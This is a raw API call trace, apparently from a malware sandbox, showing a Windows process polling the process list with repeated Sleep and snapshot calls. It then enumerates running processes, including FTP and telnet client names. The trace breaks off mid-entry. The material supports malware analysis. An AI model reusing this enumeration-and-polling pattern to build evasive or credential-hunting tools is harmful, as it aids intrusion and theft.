Sleep (dwMilliseconds=0x64) [0297.138] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0297.152] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.494] Sleep (dwMilliseconds=0x64) [0297.588] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0297.600] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.783] Sleep (dwMilliseconds=0x64) [0297.895] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0297.907] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.217] Sleep (dwMilliseconds=0x64) [0298.349] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0298.364] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.507] Sleep (dwMilliseconds=0x64) [0298.558] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0298.569] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.682] Sleep (dwMilliseconds=0x64) [0298.703] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0298.723] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.882] Sleep (dwMilliseconds=0x64) [0298.936] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0298.946] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.126] Sleep (dwMilliseconds=0x64) [0299.172] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0299.186] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.284] Sleep (dwMilliseconds=0x64) [0299.294] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0299.305] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.504] Sleep (dwMilliseconds=0x64) [0299.563] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0299.579] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.892] Sleep (dwMilliseconds=0x64) [0300.028] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0300.041] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.222] Sleep (dwMilliseconds=0x64) [0300.346] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x227c [0300.361] Process32First (in: hSnapshot=0x227c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.445] Sleep (dwMilliseconds=0x64) [0300.452] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x227c [0300.517] Process32First (in: hSnapshot=0x227c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.586] Sleep (dwMilliseconds=0x64) [0300.640] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x227c [0300.650] Process32First (in: hSnapshot=0x227c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.853] Sleep (dwMilliseconds=0x64) [0300.880] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0300.890] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.966] Sleep (dwMilliseconds=0x64) [0301.028] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x227c [0301.086] Process32First (in: hSnapshot=0x227c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.256] Sleep (dwMilliseconds=0x64) [0301.297] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0301.394] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.470] Sleep (dwMilliseconds=0x64) [0301.484] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0301.500] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.591] Sleep (dwMilliseconds=0x64) [0301.630] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x227c [0301.677] Process32First (in: hSnapshot=0x227c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.765] Sleep (dwMilliseconds=0x64) [0301.810] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x227c [0301.822] Process32First (in: hSnapshot=0x227c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.889] Sleep (dwMilliseconds=0x64) [0302.853] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x227c [0302.867] Process32First (in: hSnapshot=0x227c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.973] Sleep (dwMilliseconds=0x64) [0303.110] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0303.120] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.126] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0303.128] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0303.130] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0303.132] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0303.134] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0303.140] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0303.141] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0303.143] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0303.144] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.146] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.147] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0303.148] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.212] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.214] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.216] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.217] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.219] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.220] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.222] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0303.224] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0303.225] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0303.227] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.228] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0303.230] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0303.234] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0303.236] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0303.238] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0303.239] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.240] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0303.242] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0303.247] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0303.249] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0303.251] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0303.252] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0303.254] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0303.255] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0303.257] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0303.258] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0303.260] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0303.940] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0303.941] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0303.943] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0303.945] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0303.946] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0303.952] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0303.954] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0303.956] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0303.957] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0303.959] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0303.960] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0303.962] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0303.970] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0303.972] Process32Next (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 